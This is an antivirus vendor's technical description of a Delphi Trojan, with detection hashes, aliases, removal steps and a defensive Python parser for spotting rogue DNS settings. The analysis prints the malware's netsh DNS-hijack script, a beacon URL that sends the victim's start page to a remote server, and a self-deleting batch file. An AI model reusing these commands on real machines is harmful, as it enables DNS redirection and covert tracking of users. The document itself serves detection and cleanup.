
Trojan.Win32.Buzus.fbcr

Detected Aug 09 2010 12:19 GMT
Released Aug 09 2010 20:58 GMT
Published Oct 26 2010 10:21 GMT

This description was created by experts at Kaspersky Lab. It contains the most accurate information available about this program.

Technical Details

This Trojan has a malicious payload. It is a Windows application (PE EXE file). It is 585 661 bytes in size. It is written in Delphi.


Payload

The program's main window is shown below:

Once launched, the Trojan performs the following actions:

  • If it detects the following processes, it ceases running:
    VMwareUser.exe
    VMwareService.exe
    VMwareTray.exe
    
  • It checks for the presence of the following system registry key (which presumably is created by other malicious programs):
    [HKLM\Software\Microsoft\HTTP_UPDATE]
  • It moves the following files:
    For Windows XP and Windows 2003:
    %Documents and Settings%\All Users\Templates\Directdb.xml
    For Windows Vista and Windows 7:
    %Temporary Internet Files%\Directdb.xml
    It moves these files under the following names respectively:
    %Documents and Settings%\All Users\Templates\qweoi.tmp
    %Temporary Internet Files%\qweoi.tmp
    
    Then it executes a deferred deletion of these files (the origin or ownership of the deleted files by certain applications has not been established).
  • It deletes the following files (the origin or ownership of the deleted files by certain applications has not been established):
    C:\RECYCLER\Update.exe
    C:\RECYCLER\UpdateSet.exe
    
  • It causes the following error message to be displayed:

The Trojan also launches two copies of its body, into which it injects code from its resources.

The code injected into the first copy is 99 328 bytes in size. It is detected by Kaspersky Anti-Virus as Trojan-Downloader.Win32.Agent.eisi. The injected code performs the following actions:

  • It deletes the following file:
    <X>:\tmp.log
    where <X> indicates the system disk.
  • It runs the following command:
    ipconfig.exe /all >C:\tmp.log
    This command saves the Windows IP configuration to the file "C:\tmp.log".
  • It rewrites the content of the "C:\tmp.log" file with the following strings:
    pushd interface ip
    set dns name="<Name>" source=static addr=121.***.240 register=PRIMARY
    add dns name="<Name>" addr=125.***.219 index=2
    set wins name="<Name>" source=static addr=none
    popd
    
    where <Name> is the name of the network connection, for example "Local Area Connection". It runs the command shown below:
    netsh.exe -f C:\tmp.log
    This modifies the addresses of the main and auxiliary DNS servers and, as a consequence, redirects all DNS requests to the specified addresses. The DNS server modification method is implemented in such a way that it works only on systems where the string "Ethernet adapter" in the output of the "ipconfig /all" command has not been localized, i.e. translated into a national language. For example, it does not work on a Russian localization, since that string does not appear in the output of "ipconfig /all"; the localized string "Ethernet адаптер" is displayed in its place.
  • It terminates the following process:
    ipconfig.exe
  • It sends a request to the following site:
    http://www.qq***nead.com/GetServer.asp?Mac=<StartPage>&otherInfo=ok
    where <StartPage> is the home page, received from the following registry key:
    [HKCU\Software\Microsoft\Internet Explorer\Main\Start Page]
  • It creates the directory:
    C:\RECYCLER\
    where it places its body as:
    Temp.dat
    and executes deferred deletion of this file.

The code injected into the second copy is 479 232 bytes in size. This code performs the following actions:
  • It connects to the following resource using a GET request:
    http://yuanfa***43759.com/xg/updateinfo.htm
    At the time of writing, this resource was not accessible.

    The response to this request is checked for the requested data (response code 200) and for the string:
    Start
    The received data is then processed. Presumably it contains a list, possibly of URL addresses, since the code responsible for handling the received data performs an extensive search for delimiters; however, the processing mechanism has not been investigated, as the resource is no longer available and the processing is data-driven.
  • If the server's response from the above-mentioned address does not contain the requested data, the "infmantion.bat" file is created in the working directory. This file contains the following strings:
    :try
    del /q /f "<Path_to_original_body_of_trojan>"
    if exist <Path_to_original_body_of_trojan> goto try
    del %0
    
    Running this file deletes the body of the Trojan.
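The DNS hijack described above (the netsh script written to C:\tmp.log and the hard-coded "Ethernet adapter" prefix that makes it fail on localized systems) can be illustrated with a small parser. This is an added example, not code from the report or the Trojan; the script text and the ipconfig fragments are constructed samples with placeholder addresses, and the allow-list is a hypothetical set of the organisation's legitimate DNS servers.

```python
import re

# Constructed sample of the netsh script the Trojan writes to C:\tmp.log
# (addresses are documentation placeholders, not the ones in the report).
SAMPLE_SCRIPT = """pushd interface ip
set dns name="Local Area Connection" source=static addr=192.0.2.10 register=PRIMARY
add dns name="Local Area Connection" addr=192.0.2.11 index=2
set wins name="Local Area Connection" source=static addr=none
popd
"""

# Constructed fragments of 'ipconfig /all' output, English and Russian-localized.
IPCONFIG_EN = """Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
"""
IPCONFIG_RU = """Настройка протокола IP для Windows

Ethernet адаптер Подключение по локальной сети:

   DNS-суффикс подключения . . . . . :
"""


def adapter_names(ipconfig_output):
    """Return connection names found via the English 'Ethernet adapter' prefix.

    On a localized system the prefix is translated, so nothing is found; this
    is the failure mode the report notes for the Russian localization.
    """
    return re.findall(r"^Ethernet adapter (.+):\s*$", ipconfig_output, re.M)


def dns_changes(script, allowed):
    """Return (adapter, server) pairs for every 'set dns' / 'add dns' line in a
    netsh script whose server address is not in the allow-list."""
    findings = []
    for line in script.splitlines():
        m = re.match(r'\s*(set|add) dns name="([^"]+)".*?addr=(\S+)', line)
        if m and m.group(3) not in allowed:
            findings.append((m.group(2), m.group(3)))
    return findings


if __name__ == "__main__":
    print(adapter_names(IPCONFIG_EN), adapter_names(IPCONFIG_RU))
    print(dns_changes(SAMPLE_SCRIPT, {"10.0.0.53"}))
```

Running `dns_changes` over a recovered tmp.log, or over a captured `netsh -f` command line, surfaces the injected DNS servers that step 4 of the removal instructions asks the administrator to replace.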


Removal instructions

If your computer does not have antivirus protection and has been infected by this malicious program, follow the instructions below to delete it:

  1. Use Task Manager to terminate the malicious process.
  2. Delete the original Trojan file (its location will depend on how the program originally penetrated the infected computer).
  3. Delete the following files:
    %Temp%\<rnd>
    <X>:\tmp.log
    where <X> indicates the system disk.
  4. Your network administrator can provide the original values for the main and auxiliary DNS servers so you can restore them in your system.
  5. Perform a full scan of the computer using Kaspersky Anti-Virus with up-to-date antivirus databases (download a trial version).


MD5: FC3DE44747ABFBAA117ABB8EF705021F
SHA1: 49E735F831AFF55995564C3E2BCA82DF73E356AD


Trojan

This type of behaviour covers malicious programs that delete, block, modify, or copy data, disrupt computer or network performance, but which cannot be classified under any of the behaviours identified above.

This classification also covers “multipurpose” Trojan programs, i.e. those that are capable of conducting several actions at once and which demonstrate several Trojan behaviours in a single program. This means they cannot be indisputably classified as having any single behaviour.


Aliases

Trojan.Win32.Buzus.fbcr (Kaspersky Lab) is also known as:

  • Trojan: Generic.dx!tio (McAfee)
  • Mal/Packer (Sophos)
  • Trojan.PcClient-2361 (ClamAV)
  • Trj/Buzus.AH (Panda)
  • W32/Heuristic-210!Eldorado (FPROT)
  • Trojan:Win32/Remhead (MS(OneCare))
  • Trojan.DownLoader1.35450 (DrWeb)
  • a variant of Win32/TrojanDownloader.Agent.TGOQCW trojan (Nod32)
  • Trojan.Generic.4561194 (BitDef7)
  • Trojan.Generic.4555152 (BitDef7)
  • Trojan.Generic.4560739 (BitDef7)
  • Trojan.Agent.Delf.ROH (BitDef7)
  • Packed/NSPack (VirusBuster)
  • Win32:Malware-gen (AVAST)
  • Backdoor.Win32.GrayBird.ej (Ikarus)
  • Generic18.BKUU (AVG)
  • TR/ATRAPS.Gen (AVIRA)
  • W32/Packed_NsPack.I (Norman)
  • Trojan.Win32.Generic.52262102 (Rising)
  • Trojan.Win32.Generic.52259EAA (Rising)
  • Trojan.Win32.Generic.52259B43 (Rising)
  • Trojan.Win32.Buzus.fbcr [AVP] (FSecure)
  • Trojan.Win32.Buzus (Sunbelt)
  • Packed/NSPack (VirusBusterBeta)